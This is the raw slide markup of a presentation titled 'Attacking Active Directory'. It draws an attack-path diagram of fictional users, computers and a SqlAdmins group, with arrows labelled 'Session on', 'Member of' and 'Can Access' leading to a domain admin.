            <a:ext cx="510466" cy="8363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220DDEEB-1F37-47F7-BAB9-E3D49B32BD15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="0"/>
            <a:endCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1393637" y="3563449"/>
            <a:ext cx="224975" cy="8755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D5B2B314-E97D-4252-A723-9EF1556CECBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="22" idx="2"/>
            <a:endCxn id="25" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3709386" y="2181270"/>
            <a:ext cx="1228150" cy="480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EFB2CE59-44F2-4EE3-930B-9C9B1435CFD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="1"/>
            <a:endCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3335743" y="2554913"/>
            <a:ext cx="579929" cy="7805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Oval 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC466088-627C-4639-BD4B-757E91638695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620376" y="4364521"/>
            <a:ext cx="1153399" cy="8433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Mary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299249C8-B523-4D5D-815C-FC6381869D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="2"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8832576" y="5159854"/>
            <a:ext cx="1350405" cy="893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ED0336BD-E128-412E-B5FE-408B872942EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="26" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8458933" y="3526812"/>
            <a:ext cx="135432" cy="12593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553C072D-CF00-493A-A8E2-E3F798363998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4023634" y="4918229"/>
            <a:ext cx="1596744" cy="7113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43C98AFE-8F5D-4B6E-B73E-D8CABFD268D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3649991" y="3931848"/>
            <a:ext cx="265681" cy="13240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2BD366A5-6CE4-488D-9039-23BFA8C59463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6707497" y="3526812"/>
            <a:ext cx="1377792" cy="102125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38BB425F-8A90-49AC-A4FE-698505C6148C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="3971845"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E4F993-C545-4388-BAA6-B9F3FC3F05A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="183374" y="2213330"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="TextBox 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E7A9FA-F3CF-4BE7-A3C2-3D5112F47027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962614" y="1576250"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF289988-DBBF-426B-B022-44C77A294621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475896" y="2679849"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="TextBox 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31046626-8119-4EDD-9968-699815511B90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775519" y="1760916"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="TextBox 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E7AF95-D51B-481B-B676-88C74B7A177F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775519" y="4333751"/>
            <a:ext cx="1416867" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81F4BFB-6AA8-43D3-A191-097A6F8A6D69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413703" y="5301606"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC7D4DD1-C36B-4D30-BC95-6DA41FF81AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189993" y="3576335"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Member of</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="TextBox 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5037F64D-DB5D-441B-9B7E-38E7BBB331E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458932" y="3870692"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Straight Arrow Connector 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E9769F-990A-494F-A77B-6612E4C1FAAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="42" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6604864" y="5084389"/>
            <a:ext cx="1419712" cy="986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DD87F1C6-E23C-40CE-AB91-E468FE21A52C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6511395" y="5116940"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="TextBox 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FD1A6D-499B-487B-94BB-944448D3A82B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8893289" y="5396877"/>
            <a:ext cx="1416867" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D7ED58F-C0CF-4112-BB26-650A82495877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212213092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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Attack Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A464831-E962-428C-ABBA-BD95549122D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633191" y="1136453"/>
            <a:ext cx="949910" cy="8433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Bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Oval 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{592BCA9D-16F0-45B2-9F7F-757CDBC8CC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918682" y="4438951"/>
            <a:ext cx="949910" cy="8433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Joe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CCE8F3-A266-4C87-A784-0840E5576488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937536" y="1807626"/>
            <a:ext cx="1365681" cy="8433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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Oval 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53192FB8-D90F-44D5-BF2C-2B9D5090091D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10182981" y="4827560"/>
            <a:ext cx="1427824" cy="843378"/>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DA Steve</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992618C5-B3C4-476A-B477-69D902FEDF8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244968" y="2816162"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Graphic 24" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B323E4BF-E29D-499D-B917-B2885056FDF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962099" y="1807626"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA5126E-9CE8-4035-8011-4A52E66E076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085289" y="4786210"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Graphic 26" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A60074-A66E-4DD4-878F-A5EC88EA1E4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276347" y="5255944"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Star: 7 Points 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB0D2ACD-C48C-44C2-86AB-3877577A44C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7600435" y="2794280"/>
            <a:ext cx="1987861" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="star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t>SqlAdmins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Oval 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB3F2409-76C9-4308-835C-ED291082A032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746761" y="3211980"/>
            <a:ext cx="1153399" cy="8433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John</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B704972E-E133-41D9-8B3A-F6AE024B9399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="6"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="1558142"/>
            <a:ext cx="1378998" cy="623128"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent1">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94A3E066-4910-4F96-BEA7-BDC498C7EFA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="4"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1108146" y="1979831"/>
            <a:ext cx="510466" cy="8363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220DDEEB-1F37-47F7-BAB9-E3D49B32BD15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="0"/>
            <a:endCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1393637" y="3563449"/>
            <a:ext cx="224975" cy="8755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D5B2B314-E97D-4252-A723-9EF1556CECBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="22" idx="2"/>
            <a:endCxn id="25" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3709386" y="2181270"/>
            <a:ext cx="1228150" cy="480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EFB2CE59-44F2-4EE3-930B-9C9B1435CFD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="1"/>
            <a:endCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3335743" y="2554913"/>
            <a:ext cx="579929" cy="780577"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent1">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42" name="Oval 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC466088-627C-4639-BD4B-757E91638695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620376" y="4364521"/>
            <a:ext cx="1153399" cy="8433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Mary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299249C8-B523-4D5D-815C-FC6381869D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="2"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8832576" y="5159854"/>
            <a:ext cx="1350405" cy="89395"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent1">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ED0336BD-E128-412E-B5FE-408B872942EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="26" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
